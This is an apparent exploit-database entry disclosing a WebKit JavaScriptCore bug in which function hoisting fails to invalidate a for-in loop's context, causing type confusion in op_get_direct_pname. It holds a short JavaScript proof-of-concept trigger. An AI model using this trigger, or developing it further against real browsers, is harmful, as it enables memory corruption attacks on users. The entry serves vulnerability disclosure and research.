WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Exploit

2018-12-01
ID: 100380
CVE: None
Download vulnerable application: None
WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the ForInContext Object
 /*
This is simillar to  issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.
  PoC:
*/
  function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;
              function k() {
              }
        }
          o[k];
    }
}
  trigger();
1.1.11-prod (www02)